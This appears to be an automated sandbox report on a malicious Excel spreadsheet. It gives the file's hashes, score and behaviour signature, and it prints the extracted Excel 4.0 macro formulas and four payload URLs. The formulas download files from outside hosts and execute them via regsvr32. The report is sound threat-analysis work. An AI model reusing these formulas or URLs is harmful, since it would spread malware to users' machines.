General
Target: 5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946
Size: 92KB
Sample: 230211-cs9tzadd2v
MD5: c8d86480cae889d55896e2642369a5f1
SHA1: 5912e9a715533d5b9110daab4dbafe49236c8891
SHA256: 5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946
SHA512: 8b7182cdd30b1a95412bd847c30ff32e2493c5c445a0fcea12ce5801db7b3657a5230b328db66b44994c195862ffd7187acd972d771f8182e54b750563ef7714
SSDEEP: 1536:/Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdApbCXuZH4gb4CEn9J4ZKnQxW:tk3hOdsylKlgxopeiBNhZFGzE+cL2kdH
Behavioral task: behavioral1
Sample: 5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946.xls
Resource: win7-20220812-en

Behavioral task: behavioral2
Sample: 5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946.xls
Resource: win10v2004-20220901-en
Malware Config
Extracted (URLs):
http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/
http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/
https://wijsneusmedia.nl/cgi-bin/kFB/
http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/

Extracted (Excel 4.0 macro formulas, one per line):
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/","..\elv1.ooocccxxx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/","..\elv2.ooocccxxx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wijsneusmedia.nl/cgi-bin/kFB/","..\elv3.ooocccxxx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/","..\elv4.ooocccxxx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx")
=RETURN()

Extracted (URLs, second task):
http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/
http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/
https://wijsneusmedia.nl/cgi-bin/kFB/
http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/
Targets
Target: 5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946
Size: 92KB
MD5: c8d86480cae889d55896e2642369a5f1
SHA1: 5912e9a715533d5b9110daab4dbafe49236c8891
SHA256: 5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946
SHA512: 8b7182cdd30b1a95412bd847c30ff32e2493c5c445a0fcea12ce5801db7b3657a5230b328db66b44994c195862ffd7187acd972d771f8182e54b750563ef7714
SSDEEP: 1536:/Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdApbCXuZH4gb4CEn9J4ZKnQxW:tk3hOdsylKlgxopeiBNhZFGzE+cL2kdH
Score: 10/10

Signature: Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.